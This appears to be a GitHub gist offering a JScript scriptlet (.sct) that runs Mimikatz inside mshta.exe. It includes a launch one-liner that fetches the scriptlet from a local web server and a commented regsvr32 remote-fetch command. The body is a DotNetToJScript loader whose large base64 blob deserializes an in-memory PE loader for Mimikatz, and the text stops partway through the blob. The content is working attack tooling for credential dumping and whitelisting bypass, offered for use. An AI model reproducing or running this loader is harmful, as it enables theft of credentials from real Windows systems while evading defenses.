Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
// Mimikatz Loader
// Built with DotNetToJScript.
function Exec()
{
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAADYAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs6ZgWgAAAAAA"+
"AAAA4AACIQsBCwAALgAAAAYAAAAAAACeTAAAACAAAABgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAKAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATEwA"+
"AE8AAAAAYAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAgAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACkLAAAACAAAAAuAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABg"+
"AAAABAAAADAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAgAAAAAIAAAA0AAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAIBMAAAAAAAASAAAAAIABQDALAAAjB8AAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADABkAAAAB"+
"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"+
"Dq4KBgBIDq4KBgBdDq4KBgBwDq4KBgB+DgIBBgCtDp0OAAAAAAEAAAAAAAEAAQABABAAFwAAAAUA"+
"AQABAAEAEAAhAAAABQAGAAgACgEQACoAAAAJAAwAEQAKARAAOwAAAAkAKwARAAoBEABQAAAACQAt"+
"ABEACgEQAGgAAAAJAFsAEQAKARAAgAAAAAkAiAARABIBEACSAAAACQCPABEACgEQAKcAAAAJAJkA"+
"EgACAQAAvQAAAA0AmwASAAAAEADOAAAABQCdABIACgEQAKcAAAAJAKEAGQAKARAA4QAAAAkAowAZ"+
"AFGAHwEKAFGALAESAFGAOgESAFGASwESABYAYwEqAAEAuwFQAAEAxQFUAAEA0AFYAAEA4QFcAAEA"+
"8gFgAAEABgJlAAYA9wK4AAYA/wK4AAYABgO4AAYACwO4AAYAEgO4AAYAHAO4AAYAJwO4AAYAMgO4"+
"AAYANwO4AAYAPAO4AAYAQwO4AAYASAO4AAYATQO4AAYAVgO4AAYAXQO4AAYAZQO4AAYAbQO4AAYA"+
"dQO4AAYAfQO4AAYAhQO4AAYAjwO4AAYAmAO4AAYAoQO4AAYAqgO4AAYAswO4AAYAvAO4AAYAxQO4"+
"AAYAzgO4AAYA1wO4AAYA4AO4AAYA6QMSAAYA8gMSAAYAAQQSAAYABgS4AAYADAS7AAYAHwS7AAYA"+
"MgQSAAYAPQQSAAYAUwQSAAYAawQSAAYAfwQSAAYAigQSAAYAlQQSAAYAnwQSAAYAsAQSAAYAvgS4"+
"AAYA2gS4AAYA9gS4AAYACAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYA"+
"ewW4AAYAhQW4AAYAmAUSAAYAqwUSAAYAvQUSAAYAzwUSAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+"+
"AAYAGAa+AAYAJga+AAYANQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYA"+
"kAa+AAYAnAa+AAYAoAa+AAYAtga+AAYAxwa+AAYABgS4AAYADAS7AAYAHwS7AAYAMgQSAAYAPQQS"+
"AAYAUwQSAAYAawQSAAYAfwQSAAYAlQTCAAYAnwQSAAYAsAQSAAYAvgS4AAYA2gS4AAYA9gS4AAYA"+
"CAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYAewW4AAYAhQW4AAYAmAXC"+
"AAYAqwXCAAYAvQXCAAYAzwXCAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+AAYAGAa+AAYAJga+AAYA"+
"NQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYAkAa+AAYAnAa+AAYAoAa+"+
"AAYAtga+AAYAxwa+AAYA0Aa4AAYA2Aa4AAYA6QYSAAYA9wYSAAYADAcSAAYAHAe4AAYAMQe4AAYQ"+
"QQfFAAYARgcSAAYA8gMSAAYAUgcSAAYAYAcSAAYAcQcSAAYAhgcSAAYAmwe4AAYArwe4AAYAMQfJ"+
"AAYA1wcSAAYA5QcSAAYG8QcSAFaA+QfJABYA/gcSABYACQgSABYAFQgSABYALAgSAAYA1wcSAAYA"+
"5QcSAAYAhAgSAAYA6QYSAAYAlwgSAAYAQQcSAAYApggSAFAgAAAAAJYAWQEkAAEAAAAAAIAAkSBs"+
"AS0AAwAAAAAAgACRIHkBMQADAHggAAAAAJYAhAE8AAoA1iAAAAAAhhiSAUAACgD0IAAAAACWAKkB"+
"RAAKAGghAAAAAJYAswFLAAsAfCkAAAAAhhiSAWkADACAKgAAAACGGJIBbgANAIArAAAAAJYAHAJ0"+
"AA4A2CsAAAAAhggvAnwADwAALAAAAACGCEECgAAPABgsAAAAAIYIUAKFAA8AMCwAAAAAhghlAooA"+
"DwBILAAAAACGCHoCjwAPAGAsAAAAAIYIkgKVAA8AeCwAAAAAhgjDB80ADwAAAAAAgACWIDsI2gAP"+
"AAAAAACAAJYgSAjiABMAAAAAAIAAliBUCOcAFAAAAAAAgACWIGMI7QAWAAAAAACAAJYgcAj3ABwA"+
"uCwAAAAAhhiSAUAAHgCVLAAAAACRGJYOPAAeAAAAAQCxCAAAAgCzCAAAAQC1CAAAAgDACAAAAwDQ"+
"CAAABADcCAAABQDxCAAABgAHCQAABwAcCQAAAQAqCQAAAQAwCQAAAQA0CQAAAQA9CQAAAQBHCQAA"+
"AQBOCQAAAgBaCQAAAwBfCQAABABwCQAAAQC1CAAAAQB6CQAAAgCCCQAAAQCLCQAAAgCeCQAAAwCq"+
"CQAABAC5CQAABQC/CQAABgDPCQAAAQDaCQAAAgDiCTEAkgH9AEEAkgEDAUkAkgFAAFEApgoIAVEA"+
"kgEMAVkAkgFpAGEAkgEWAWkAkgEcAXkAQwskAYEAkgEqAYEAXAsyAYkAfQs3AQkAkgFAAKEAkgFA"+
"ACEAlgtJASEAnAtRAaEAoQuVAKkAtQtAALEAkgFAALEA0gtkAaEAkgFuALkAkgFqAbkARAxwAQwA"+
"eQyAARQAhwyQAckAkwzNANkApwyVAVEAswwtAMkAvAybAeEA4Ax8AOkA8wygAVEABg0qAPEAEw2l"+
"AVEAGA2uAfkANw2yAfEASQ26AfEAWA3BAfEAXw3HAfEAaQ3NAfEAcw3SAfEAfg3YAfEAiA3dAfEA"+
"kw3jAVEAow3NAVEArw0kAFEAow3YAWkAkgErAikAkgFqASEAxw06AikAzA1CAhkB3A1aAqEAkgFJ"+
"ASkA6Q13AiEBCQ59AiEBDw6HAiEBIg5AADEBkgG2AkEBkgEDAUkBkgG9AtkAkgHHAlkBkgFAAGEB"+
"kgFAAAgABAANAAkACAAVAAkADAAaAAkAEAAfAAkAcALVACcA8wHRAi4AEwDWAi4AGwDfAmMB6wHR"+
"Ah4BxAIIAAYA/gIBAAAAAAAGAAEAAAAAAAcAAQAAAAAACAAAAAAAjwAIAAAAkAAMAAAAkQAQAAAA"+
"kgAUAAAAkwAYAAAAlAAcAAAAlQAgAAAAlgAiAAAAlwAkAAAAmAARAT0BWQHoAWACagKLApcCnAKh"+
"AqYCqwKxAs0CAwABAAkABwAAAJ8CmgAAAK0CngAAALgCowAAAMkCqAAAANoCrQAAAO4CswAAAM8H"+
"0QACAAsAAwACAAwABQACAA0ABwACAA4ACQACAA8ACwACABAADQACABEADwDgCo0OeQGJAXQCRgMF"+
"AGwBAQBAAQcAeQEBAAABJQA7CAIARAEnAEgIAQBDASkAVAgBAAABKwBjCAIAAAEtAHAIAgAEgAAA"+
"AAAAAAAAAAAAAAAAAACWCgAABAAAAAAAAAAAAAAAAQD5AAAAAAAEAAAAAAAAAAAAAAABAAIBAAAA"+
"AAQAAAAAAAAAAAAAAAEA3wsAAAAABAADAAUAAwAGAAMABwADAAgAAwAJAAMACgADAAsAAwANAAwA"+
"DgAMAAAAAAAVAC0CFAA1AhQARgIUAEsCFABQAhQAVQIAAAA8TW9kdWxlPgBuZXRrYXR6My5kbGwA"+
"VGVzdENsYXNzAFBFTG9hZGVyAElNQUdFX0RPU19IRUFERVIASU1BR0VfREFUQV9ESVJFQ1RPUlkA"+
"SU1BR0VfT1BUSU9OQUxfSEVBREVSMzIASU1BR0VfT1BUSU9OQUxfSEVBREVSNjQASU1BR0VfRklM"+
"RV9IRUFERVIASU1BR0VfU0VDVElPTl9IRUFERVIASU1BR0VfQkFTRV9SRUxPQ0FUSU9OAERhdGFT"+
"ZWN0aW9uRmxhZ3MATmF0aXZlRGVjbGFyYXRpb25zAElNQUdFX0lNUE9SVF9ERVNDUklQVE9SAG1z"+
"Y29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0ATVlfQ09ERV9QQUdFAEdFTkVSSUNf"+
"V1JJVEUARklMRV9TSEFSRV9XUklURQBPUEVOX0VYSVNUSU5HAEludFB0ckFkZABjb2RlYmFzZQBB"+
"bGxvY0NvbnNvbGUAQ3JlYXRlRmlsZQBDcmVhdGVDb25zb2xlAC5jdG9yAFN5c3RlbS5JTwBTdHJl"+
"YW0AUmVhZEZ1bGx5AEV4ZWN1dGUAZG9zSGVhZGVyAGZpbGVIZWFkZXIAb3B0aW9uYWxIZWFkZXIz"+
"MgBvcHRpb25hbEhlYWRlcjY0AGltYWdlU2VjdGlvbkhlYWRlcnMAcmF3Ynl0ZXMAQmluYXJ5UmVh"+
"ZGVyAEZyb21CaW5hcnlSZWFkZXIAVABnZXRfSXMzMkJpdEhlYWRlcgBnZXRfRmlsZUhlYWRlcgBn"+
"ZXRfT3B0aW9uYWxIZWFkZXIzMgBnZXRfT3B0aW9uYWxIZWFkZXI2NABnZXRfSW1hZ2VTZWN0aW9u"+
"SGVhZGVycwBnZXRfUmF3Qnl0ZXMASXMzMkJpdEhlYWRlcgBGaWxlSGVhZGVyAE9wdGlvbmFsSGVh"+
"ZGVyMzIAT3B0aW9uYWxIZWFkZXI2NABJbWFnZVNlY3Rpb25IZWFkZXJzAFJhd0J5dGVzAGVfbWFn"+
"aWMAZV9jYmxwAGVfY3AAZV9jcmxjAGVfY3BhcmhkcgBlX21pbmFsbG9jAGVfbWF4YWxsb2MAZV9z"+
"cwBlX3NwAGVfY3N1bQBlX2lwAGVfY3MAZV9sZmFybGMAZV9vdm5vAGVfcmVzXzAAZV9yZXNfMQBl"+
"X3Jlc18yAGVfcmVzXzMAZV9vZW1pZABlX29lbWluZm8AZV9yZXMyXzAAZV9yZXMyXzEAZV9yZXMy"+
"XzIAZV9yZXMyXzMAZV9yZXMyXzQAZV9yZXMyXzUAZV9yZXMyXzYAZV9yZXMyXzcAZV9yZXMyXzgA"+
"ZV9yZXMyXzkAZV9sZmFuZXcAVmlydHVhbEFkZHJlc3MAU2l6ZQBNYWdpYwBNYWpvckxpbmtlclZl"+
"cnNpb24ATWlub3JMaW5rZXJWZXJzaW9uAFNpemVPZkNvZGUAU2l6ZU9mSW5pdGlhbGl6ZWREYXRh"+
"AFNpemVPZlVuaW5pdGlhbGl6ZWREYXRhAEFkZHJlc3NPZkVudHJ5UG9pbnQAQmFzZU9mQ29kZQBC"+
"YXNlT2ZEYXRhAEltYWdlQmFzZQBTZWN0aW9uQWxpZ25tZW50AEZpbGVBbGlnbm1lbnQATWFqb3JP"+
"cGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1pbm9yT3BlcmF0aW5nU3lzdGVtVmVyc2lvbgBNYWpvcklt"+
"YWdlVmVyc2lvbgBNaW5vckltYWdlVmVyc2lvbgBNYWpvclN1YnN5c3RlbVZlcnNpb24ATWlub3JT"+
"dWJzeXN0ZW1WZXJzaW9uAFdpbjMyVmVyc2lvblZhbHVlAFNpemVPZkltYWdlAFNpemVPZkhlYWRl"+
"cnMAQ2hlY2tTdW0AU3Vic3lzdGVtAERsbENoYXJhY3RlcmlzdGljcwBTaXplT2ZTdGFja1Jlc2Vy"+
"dmUAU2l6ZU9mU3RhY2tDb21taXQAU2l6ZU9mSGVhcFJlc2VydmUAU2l6ZU9mSGVhcENvbW1pdABM"+
"b2FkZXJGbGFncwBOdW1iZXJPZlJ2YUFuZFNpemVzAEV4cG9ydFRhYmxlAEltcG9ydFRhYmxlAFJl"+
"c291cmNlVGFibGUARXhjZXB0aW9uVGFibGUAQ2VydGlmaWNhdGVUYWJsZQBCYXNlUmVsb2NhdGlv"+
"blRhYmxlAERlYnVnAEFyY2hpdGVjdHVyZQBHbG9iYWxQdHIAVExTVGFibGUATG9hZENvbmZpZ1Rh"+
"YmxlAEJvdW5kSW1wb3J0AElBVABEZWxheUltcG9ydERlc2NyaXB0b3IAQ0xSUnVudGltZUhlYWRl"+
"cgBSZXNlcnZlZABNYWNoaW5lAE51bWJlck9mU2VjdGlvbnMAVGltZURhdGVTdGFtcABQb2ludGVy"+
"VG9TeW1ib2xUYWJsZQBOdW1iZXJPZlN5bWJvbHMAU2l6ZU9mT3B0aW9uYWxIZWFkZXIAQ2hhcmFj"+
"dGVyaXN0aWNzAE5hbWUAVmlydHVhbFNpemUAU2l6ZU9mUmF3RGF0YQBQb2ludGVyVG9SYXdEYXRh"+
"AFBvaW50ZXJUb1JlbG9jYXRpb25zAFBvaW50ZXJUb0xpbmVudW1iZXJzAE51bWJlck9mUmVsb2Nh"+
"dGlvbnMATnVtYmVyT2ZMaW5lbnVtYmVycwBnZXRfU2VjdGlvbgBTZWN0aW9uAFZpcnR1YWxBZHJl"+
"c3MAU2l6ZU9mQmxvY2sAdmFsdWVfXwBTdHViAE1FTV9DT01NSVQATUVNX1JFU0VSVkUAUEFHRV9F"+
"WEVDVVRFX1JFQURXUklURQBQQUdFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MATG9hZExpYnJhcnkA"+
"R2V0UHJvY0FkZHJlc3MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JTaW5nbGVPYmplY3QAT3JpZ2luYWxG"+
"aXJzdFRodW5rAEZvcndhcmRlckNoYWluAEZpcnN0VGh1bmsAYQBiAGxwRmlsZU5hbWUAZHdEZXNp"+
"cmVkQWNjZXNzAGR3U2hhcmVNb2RlAGxwU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25EaXNw"+
"b3NpdGlvbgBkd0ZsYWdzQW5kQXR0cmlidXRlcwBoVGVtcGxhdGVGaWxlAGlucHV0AHVybABmaWxl"+
"UGF0aABmaWxlQnl0ZXMAcmVhZGVyAGxwU3RhcnRBZGRyAHNpemUAZmxBbGxvY2F0aW9uVHlwZQBm"+
"bFByb3RlY3QAaE1vZHVsZQBwcm9jTmFtZQBscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUA"+
"bHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBk"+
